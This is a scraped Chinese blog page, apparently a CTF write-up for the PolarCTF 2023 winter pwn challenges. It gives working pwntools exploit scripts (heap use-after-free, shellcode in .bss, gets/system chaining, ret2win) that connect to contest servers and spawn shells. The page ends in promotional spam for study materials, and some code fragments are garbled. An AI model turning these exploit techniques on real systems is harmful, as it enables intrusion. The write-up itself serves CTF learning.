PolarCTF 2023冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北话是最好的语言

最新推荐文章于 2024-07-19 16:09:28 发布
最新推荐文章于 2024-07-19 16:09:28 发布
阅读量882 收藏 20
点赞数 29
分类专栏: 2024年程序员学习 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60635637/article/details/137497290
版权

io = remote(‘120.46.59.242’, 2066)

magic_addr = 0x400CB1

def Add(Size, Context):
io.recvuntil(‘:’)
io.sendline(‘1’)
io.recvuntil(‘:’)
io.sendline(str(Size))
io.recvuntil(‘:’)
io.sendline(Context)

def Del(Index):
io.recvuntil(‘:’)
io.sendline(‘2’)
io.recvuntil(‘:’)
io.sendline(str(Index))

def Show(Index):
io.recvuntil(‘:’)
io.sendline(‘3’)
io.recvuntil(‘:’)
io.sendline(str(Index))

io.recvuntil(‘like?’)
io.sendline(‘Hello,everyone.’)

min_Size = 0x10 + len(Context) + 1

Add(0x14, ‘polar_ctf’) # chunk 0
Add(0x19, ‘polar_ctf_2023’) # chunk 1

用于POP chunk隔离

Add(0x10, ‘polar’) # chunk 2

todo 思考为什么是先删除0,再删除1

Del(0)
Del(1)

Add(6, p64(magic_addr))
Show(0)

io.interactive()

1.2 shellcode1

本题主要考查栈溢出中shellcode写入利用相关知识

程序分析

使用checksec分析,NX保护开启情况未知

代码解读

程序一开始会进入到如下函数中

通过查看发现,read() 函数中的参数 x 位于 .bss 段

此外,由于 gets() 函数由于未对输入长度进行限制,存在栈溢出漏洞

那么,我们可以通过 read() 函数将 shellcode 写入 .bss 段中,然后通过栈溢出漏洞覆盖函数返回地址为 .bss 段中我们写入的 shellcode 地址,进而 getshell

脚本编写

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2115)
elf = ELF(‘./shellcode1’)

x_addr = 0x804a080

shellcode = asm(shellcraft.sh())
io.sendlineafter(‘name?’, shellcode)
payload = b’a’ * 0x6c + b’b’ * 4 + p32(x_addr)
io.sendlineafter(‘me:’, payload)
io.interactive()

1.3 guess

程序分析

代码解读

Start()函数中有一个gets()函数,且不对输入长度作限制,存在栈溢出漏洞

在Exports中,可以看到有一个位于.bss段的变量 buf2

那么,我们可以将 ‘/bin/bash’ 写入位于.bss段的变量 buf2 中,并将其作为system()函数的参数调用system()函数执行来get shell

脚本编写

我们通过 elf.sym[] 或者 elf.plt[] 来获取 gets system的plt表地址,初步编写脚本如下

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2069)
elf = ELF(‘./guess’)

gets_addr = elf.sym[‘gets’]
system_addr = elf.sym[‘system’]
buf2_addr = 0x804a080

payload = b’a’ * 0x6c + b’b’ * 4 + p32(gets_addr) + p32() + p32()

由于gets()函数跳过4个字节去寻找参数,那么完善payload如下

payload = b’a’ * 0x6c + b’b’ * 4 + p32(gets_addr) + p32() + p32(buf2_addr)

将 ‘/bin/bash’ 作为参数传入 buf2 中后,需要继续调用 system() 函数,并将 buf2 中的 ‘/bin/bash’ 作为system() 函数的参数调用,由于 system() 函数也是跳过4个字节去寻找参数,那么进一步完善 payload 如下

payload = b’a’ * 0x6c + b’b’ * 4 + p32(gets_addr) + p32(system_addr) + p32(buf2_addr) + p32(buf2_addr)

最终,完整脚本如下

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2069)
elf = ELF(‘./guess’)

gets_addr = elf.sym[‘gets’]
system_addr = elf.sym[‘system’]
buf2_addr = 0x804a080

payload = b’a’ * 0x6c + b’b’ * 4 + p32(gets_addr) + p32(system_addr) + p32(buf2_addr) + p32(buf2_addr)
io.sendline(payload)
io.sendline(‘/bin/sh’)
io.interactive()

中等难度

2.1 fate

程序分析

代码解读

本题一开始会进入到如下函数

由于本题直接在 exploit() 函数中给出了 system(“/bin/sh”),因此我们直接通过 back() 函数中存在的栈溢出漏洞,覆盖函数返回地址为 exploit() 函数地址即可getshell

脚本编写

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2101)

exploit_addr = 0x804887c

payload = b’a’ * 0x6c + b’b’ * 4 + p32(exploit_addr)
io.sendlineafter(‘back’, payload)
io.interactive()

2.2 look

本题为一道典型的 ret2libc32 题目

程序分析

代码解读

在Start()函数中,read()函数可读入0xc8个字节,但buf大小仅0x6c字节,存在栈溢出漏洞

由于在字串及Exports中均无其他可利用信息,也无其他后门函数,因此本题将通过 ret2libc 获取shell

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

这里插入图片描述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-2MTeybFy-1712542163842)]

m0_60635637
关注
  • 29
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PolarCTF 2023冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北是最好的语言(1)
m0_60635609的博客
04-08 673
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
PolarCTF 2023冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北是最好的语言(2)
m0_60635609的博客
04-08 674
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
PolarCTF 2024冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北是最好的语言
2401_84558783的博客
05-13 740
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
PolarCTF 2023冬季个人挑战赛 WriteUp (pwn部分)
m0_62652276的博客
01-05 1661
在本次PolarCTF 2023冬季个人挑战赛中,pwn部分题目题量较大,对栈溢出及堆溢出相关知识均有所考查。但同时,有相当一部分题目侧重于对基础知识,经典题型的考查,对于CTF入门学习者来说相对友好。本题主要考查pwn堆溢出fastbin attack相关知识使用checksec工具分析,开启了canary和NX保护运行程序有三个选项,分别进行测试设定note大小并新建一个note显示已新建的note删除创建的note可以发现main函数中有一个def()函数查看函数,该函数对应一开始出现的"Hi! Wh
PolarCTF 2023冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北是最好的语言(3)
m0_60635609的博客
04-08 876
首先,构造用于绕过def()函数的字符串io.recvuntil(‘like?’) io.sendline(‘Hello,everyone.’)然后,通过两次调用Add函数来申请两个堆块,此时输入的Size最小值 = 0x10 + len(Context) + 1Add(0x14, ‘polar_ctf’) # chunk 0 Add(0x19, ‘polar_ctf_2023’) # chunk 1可以再申请一个堆块,用于POP chunk隔离Add(0x10, ‘polar’) # chunk 2
PolarCTF 2024冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北是最好的语言(2)
2401_84558783的博客
05-13 999
Del(0)Del(1)Show(0)本题主要考查栈溢出中shellcode写入利用相关知识##### 程序分析使用checksec分析,NX保护开启情况未知!##### 代码解读程序一开始会进入到如下函数中!通过查看发现,read() 函数中的参数 x 位于 .bss 段!此外,由于 gets() 函数由于未对输入长度进行限制,存在栈溢出漏洞。
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 20200208-codegatectf2020quals 20191228-hxp36c3ctf 20191019-...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
智能网联汽车 天融信杯 信息安全攻防赛 2023 CTF真题
07-14
智能网联汽车 天融信杯 信息安全攻防赛 2023 CTF真题
自己ctf比赛的writeup.zip
10-01
CTF(Capture The Flag)比赛中,Writeup通常是指参赛者对比赛过程、解题思路以及解决方案的详细记录。这个“自己ctf比赛的writeup.zip”文件很可能包含了作者在参与CTF比赛时的全部心得体验,包括但不限于解题...
Jeopardy-Writeups:SniperOJ的CTF挑战比赛
05-18
SniperOJ的挑战文章和源代码描述平台源代码: : 挑战的Dockerfiles: : 挑战性 .├── forensics│ └── forensics100-You_Sha_Bi├── misc│ ├── misc100-baso4│ ├── misc100-md5-collision│ ├─...
网络协议-SOTP 协议格式
ziyunLLL的博客
07-19 304
SOTP(Secure Overlay Transport Protocol)是一种安全的覆盖层传输协议,旨在提供增强的安全性和功能。2.密钥管理:密钥的管理和交换是协议安全的重要部分,通常使用公钥基础设施(PKI)或密钥交换协议(如 Diffie-Hellman)。1.安全性:确保加密算法和认证算法的安全性。常用的加密算法包括 AES,常用的认证算法包括 HMAC-SHA256。3.性能:加密和认证会增加计算开销,需要在安全性和性能之间找到平衡。SOTP 协议格式的一般结构。
【Socket 编程】基于UDP协议建立多人聊天室
最新发布
稻草人敲代码的博客
07-19 296
对于服务端来说,除了要接收消息之外,还要实现一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实现的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实现的功能只有收消息。
27_MobileNetV3网络详解
https://github.com/foxpup11?tab=repositories
07-17 805
https://www.bilibili.com/video/BV1GK4y1p7uE/?spm_id_from=333.999.0.0&vd_source=7dace3632125a1ef7fd32c285eb2fbac
RTI DDS大数据碎片
qq_33089547的博客
07-17 966
PublicationBuiltingTopicData或SubscriptionBuiltnTopicData样本较大的最常见原因是序列化的TypeCode或TypeObject,但您也可能发送了大量属性(通过7.5.19 PROPERTY QosPolicy(DDS扩展))或具有较大的ContentFilteredTopic筛选器表达式,以及其他大小可变的字段,这可能会导致样本大小较大。如果您尝试发送一个大小大于MTU的DDS样本,但尚未设置DDS级碎片,您将看到IP级碎片。
Internet 控制报文协议 —— ICMPv4 和 ICMPv6 详解
u013669912的博客
07-17 881
计算机网络技术期末复习
CWPIN21的博客
07-17 1025
本文深入探讨了计算机网络的核心概念与关键技术。涵盖了网络拓扑结构,如星型、总线型和环形等,分析了它们的特点与适用场景。详细阐述了 TCP/IP 协议栈的工作原理,包括 IP 地址分配、子网掩码的作用以及路由选择算法。还探讨了网络安全方面的常见威胁,如病毒、黑客攻击等,并介绍了相应的防护措施。通过实例,让读者对计算机网络有更全面、深入的理解。
使用tcpdump 和 Wireshark进行简单TCP抓包分析【图文教程】
qq_42037383的博客
07-19 631
和都是网络分析工具,用于捕获和分析网络数据包,但它们在功能和使用上有所不同。所以,这两者实际上是搭配使用的,先用 tcpdump 命令在 Linux 服务器上抓包,接着把抓包的文件拖出到 Windows 电脑后,用 Wireshark 可视化分析。如果你是在 Windows 上抓包,只需要用 Wireshark 工具就可以。
HFCTF2022线上赛官方Writeup:WEB、CRYPTO与PWN挑战解析
"HFCTF2022线上赛官方Writeup1主要涵盖了多个网络安全和编程挑战,包括WEB、CRYPTO、PWN、REVERSE和MISC等类别。其中,题目涉及了RSA加密、MD5哈希、zlib压缩、SSRF漏洞利用、元数据解析、动态链接器预加载(ld_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值